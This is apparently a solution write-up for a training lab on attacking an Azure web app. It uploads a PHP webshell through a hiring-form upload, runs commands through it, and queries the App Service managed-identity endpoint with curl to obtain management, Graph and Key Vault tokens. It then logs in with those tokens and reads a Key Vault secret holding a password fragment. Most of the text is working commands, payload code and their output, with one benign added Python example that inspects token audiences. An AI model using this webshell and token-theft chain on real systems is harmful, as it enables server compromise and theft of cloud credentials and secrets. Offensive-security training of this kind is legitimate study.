BA Lab 03 – Solution

Navigate to the SolarDrops web application at https://solardropsuserfiles.azurewebsites.net/ and scroll to the “Hiring Section”, which contains the upload functionality. Open a text editor, paste the following PHP webshell and save it as cmd.php. Then upload it through the hiring form and click Submit.

<?php

system($_REQUEST['cmd']);

?>
SolarDrops Corporate Website – Upload Functionality

The cmd.php file was uploaded to /uploads/cmd.php. Then navigate to https://solardropsuserfiles.azurewebsites.net/uploads/cmd.php?cmd=id and verify that you have a webshell on the solardropsuserfiles App Service.

Then execute https://solardropsuserfiles.azurewebsites.net/uploads/cmd1.php?cmd=env and check for the environment variables IDENTITY_ENDPOINT and IDENTITY_HEADER. If both are present, a managed identity is assigned to the App Service.

Webshell Screenshot – Env Command Output

Upload a new PHP file cmd1.php and request access tokens for Azure Management and Azure Graph services as shown below:

<?php

system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');

system('curl "$IDENTITY_ENDPOINT?resource=https://graph.windows.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');

?>

Azure Management API (management.azure.com) serves as a central hub for interacting with and controlling various Azure resources. It provides a set of tools and endpoints for users to efficiently administer, monitor, and manage their Azure infrastructure using interfaces like Azure Portal, Azure PowerShell, and Azure CLI.

Azure Graph API (graph.windows.net) is a powerful API underpinning Microsoft Graph, offering a unified endpoint for accessing data and services within Microsoft 365 and Entra ID. This API facilitates seamless interaction with a range of resources, including users, groups, and applications, across the Microsoft cloud environment, enabling developers and administrators to streamline their access and management tasks.

Accessing https://solardropsuserfiles.azurewebsites.net/uploads/cmd1.php returns the two tokens:

Webshell Screenshot – Azure Token Generation Output

Use the access tokens to log in with the Connect-AzAccount cmdlet.

Connect-AzAccount is a fundamental cmdlet in the Azure PowerShell module, designed for authenticating and establishing a connection to an Azure account. By providing Azure credentials or utilizing alternative authentication methods like service principals, device code, or managed identities, this cmdlet ensures that the script or session has the necessary permissions to interact with the Azure environment effectively.

$mgmtToken = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImpTMVhvMU9XRGpfNTJ2YndHTmd2UU8yVnpNYyIsImtpvruRh9Fr4DINC[...]ZETZAxfb8ozyDFqQa64AB__zFykc-bte7cit1iXfcl8z6tJ3Rau_PmSiWZ0qQiLBkIkXkONvZ4D8S5_tTdM92ZBnXmiFoXvsuNXpfRvl2R_uWg'
$graph = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImpTMVhvMU9XRGpfNTJ2YndHTmd2UU8yVnpNYyIsImtpZCI6Im[...]AHgW9yp_bOSM_iw97BmvwK4zsvd7XpYVSeG52OKmP_RlkN0XW65eOMGwO51yX7lrpfDUK7ZIvJs0akMFcJwYBDZTNVnqz0_njDymQ9xnf7mghMg1kuxJtso29h2Gg'

Connect-AzAccount -AccessToken $mgmtToken -GraphAccessToken $graph -AccountId 8d8bb307-40ab-4eef-ba08-6b40584cd179

Once logged-in check if you have access to any resource by executing:

Get-AzResource

Output:

Name              : Paul-app-KeyVault
ResourceGroupName : UsersKeyVaultResGroup
ResourceType      : Microsoft.KeyVault/vaults
Location          : westeurope
ResourceId        : /subscriptions/e762621c-0447-4a4f-9e9c-da98c94a5f40/resourceGroups/UsersKeyVaultResGroup/providers/Microsoft.KeyVault/vaults/Paul-app-KeyVault

It seems that we have access to Paul-app-KeyVault. The next step is to try to read secrets from the Key Vault:

Get-AzKeyVault | fl *

Output:

ResourceId        : /subscriptions/e762621c-0447-4a4f-9e9c-da98c94a5f40/resourceGroups/UsersKeyVaultResGroup/providers/Microsoft.KeyVault/vaults/Paul-app-KeyVault
VaultName         : Paul-app-KeyVault
ResourceGroupName : UsersKeyVaultResGroup
Location          : westeurope
Tags              : {}
TagsTable         :

Get-AzKeyVaultSecret -VaultName Paul-app-KeyVault

Output:

Get-AzKeyVaultSecret : Operation returned an invalid status code 'Unauthorized'
Code: Unauthorized
Message: AKV10000: Request is missing a Bearer or PoP token.
At line:1 char:1
+ Get-AzKeyVaultSecret -VaultName Paul-app-KeyVault
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : CloseError: (:) [Get-AzKeyVaultSecret], KeyVaultErrorException
    + FullyQualifiedErrorId : Microsoft.Azure.Commands.KeyVault.GetAzureKeyVaultSecret

The error indicates that the session holds no bearer token for the Key Vault service: the management and Graph tokens are issued for other resources, and Get-AzKeyVaultSecret needs a token issued for vault.azure.net.
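An access token is only accepted by the service named in its aud (audience) claim, which is why a management token cannot read Key Vault secrets. The following added example (not part of the lab or the course material) decodes a token's payload without verifying it and checks whether the audience matches the resource a given cmdlet needs; the sample tokens are constructed, unsigned and not real Azure tokens.

```python
import base64
import json

# The resources used in this lab, mapped to the cmdlet that needs each of them.
# The Key Vault data plane only accepts tokens issued for vault.azure.net.
RESOURCE_FOR_OPERATION = {
    "Get-AzResource": "https://management.azure.com/",
    "Get-AzKeyVaultSecret": "https://vault.azure.net",
}


def _b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the padding that JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def jwt_claims(token: str) -> dict:
    """Return the payload claims of a JWT without verifying its signature.

    Inspection only: this shows what the token claims to be valid for,
    it does not prove the token is genuine or unexpired."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWT (expected header.payload.signature)")
    return json.loads(_b64url_decode(parts[1]))


def _normalize(resource: str) -> str:
    # Azure accepts the audience with or without a trailing slash.
    return resource.rstrip("/").lower()


def token_fits_operation(token: str, operation: str) -> bool:
    """True if the token's 'aud' claim matches the resource the cmdlet needs."""
    aud = jwt_claims(token).get("aud", "")
    return _normalize(aud) == _normalize(RESOURCE_FOR_OPERATION[operation])


def _fake_token(aud: str) -> str:
    """Constructed, unsigned sample token for demonstration only."""
    def enc(obj: dict) -> str:
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
    return f"{enc({'typ': 'JWT', 'alg': 'none'})}.{enc({'aud': aud, 'exp': 0})}."


if __name__ == "__main__":
    mgmt = _fake_token("https://management.azure.com/")
    vault = _fake_token("https://vault.azure.net")
    print(token_fits_operation(mgmt, "Get-AzKeyVaultSecret"))   # False: wrong audience
    print(token_fits_operation(vault, "Get-AzKeyVaultSecret"))  # True
```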

In order to request a Key Vault access token (vault.azure.net), we need to upload a new cmd2.php file with the following PHP code:

<?php

system('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');

?>

Once again, accessing https://solardropsuserfiles.azurewebsites.net/uploads/cmd2.php returns a Key Vault access token:

Disconnect from the Azure account and connect again using the newly generated Key Vault token:

Disconnect-AzAccount

Log in again using Connect-AzAccount:

$mgmtToken = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImpTMVhvMU9XRGpfNTJ2YndHTmd2UU8yVnpNYyIsImtpZCIH4vruRh9Fr4DIN[...]CCwzr8h2Vhz8xYx9meNfPFgQelpZETZAxfb8ozyDFqQa64AB__zFykc-bte7cit1iXfcl8z6tJ3Rau_PmSiWZ0qQiLBkIkXkONvZ4D8S5_tTdM92ZBnXmiFoXvsuNXpfRvl2R_uWg'
$graph = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImpTMVhvMU9XRGpfNTJ2YndHTmd2UU8yVnpNY5cNRGPAHgW9yp_bOSM_[...]iw97BmvwK4zsvd7XpYVSeG52OKmP_RlkN0XW65eOMGwO51yX7lrpfDUK7ZIvJs0akMFcJwYBDZTNVnqz0_njDymQ9xnf7mghMg1kuxJtso29h2Gg'
$keyvault = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImpTMVhvMU9XRGpfNTJ2YndHTmd2UU8yVnpNYyIsImUHMVa2iOUS16nveU[...]QdMYuL37t2X61BXBcTdx5adpQyCVGqHO9U_6UuuQ2jFKFCqYlMODl0rRI5ubCauRuMGck0f5eXP1Ci11C4DFxlxeR8Ejuu1ZjH1Q'
Connect-AzAccount -AccessToken $mgmtToken -GraphAccessToken $graph -KeyVaultAccessToken $keyvault -AccountId 8d8bb307-40ab-4eef-ba08-6b40584cd179

Once logged-in, try to read secrets using the following commands:

Get-AzKeyVaultSecret -VaultName Paul-app-KeyVault

Output:

Vault Name   : paul-app-keyvault
Name         : paul-localkeys
Version      :
Id           : https://paul-app-keyvault.vault.azure.net:443/secrets/paul-localkeys
Enabled      : True

Retrieve Key Vault Secret command:

Get-AzKeyVaultSecret -VaultName Paul-app-KeyVault -Name paul-localkeys -AsPlainText | fl *

Output:

Username: localpaul, Password Part 2/3: 6va5z IP: 10.0.2.5, Port: 5985

We have successfully found the second part of the password.